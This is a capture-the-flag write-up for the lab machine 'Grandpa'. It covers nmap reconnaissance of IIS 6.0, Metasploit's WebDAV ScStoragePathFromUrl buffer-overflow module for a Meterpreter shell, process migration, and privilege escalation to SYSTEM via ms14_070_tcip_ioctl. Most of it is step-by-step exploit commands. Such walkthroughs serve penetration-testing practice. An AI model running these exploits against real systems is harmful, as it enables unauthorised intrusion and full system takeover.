Grandpa (with Meterpreter)

IP: 10.10.10.14

Recon

nmap -T4 -A -p- 10.10.10.14

80 open http Microsoft IIS httpd 6.0

Potentially risky methods: ALL. Including TRACE (XSS Tracing) and PUT (Putting files server)

Enumeration

Google: Microsoft IIS httpd 6.0 exploit

Find Exploit-DB for WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow (https://www.exploit-db.com/exploits/41738). Per description this requires WebDAV service running in IIS 6.0 in Windows Server 2008 R2

Utilizing searchsploit against ScStoragePathFromUrl we find that msfconsole has an exploit for it. Let's try this exploit.

msfconsole
search ScStoragePathFromUrl
use 0
options
set rhosts <your ip>
run

#If doesn't work keep trying or you can change lport to 5555

Once inside the machine we can run getuid and sysinfo. We then realize we have x86 meterpreter and don't have admin privileges.

ps shows all services running on what user. If we were system we would be able to see all users running services and be able to run getuid.

Privilege Escalate

Lets try to migrate to a service running under NT Authority\Network Service to see if it can give us NT Authority access.

migrate 1788
[*] Migrating from 2876 to 1788
[*] Migration complete successfully

Phew! That worked, although we are not NT Authority yet. Lets confirm by usinggetuid.

Let's background this session and use suggester to see if we can get access another way.

search suggester
use 0
options
set session 1
run

We get 9 different options. Lets try ms14_070_tcip_ioctl alternatively ms10_015_kitrap0d works.

use exploit/windows/local/ms14_070_tcip_ioctl
set session 1
set lhost tun0 #this will autoget IP of your openvpn
run

We got a shell! Trying getuid, shows you are now NT AUTHORITY\SYSTEM .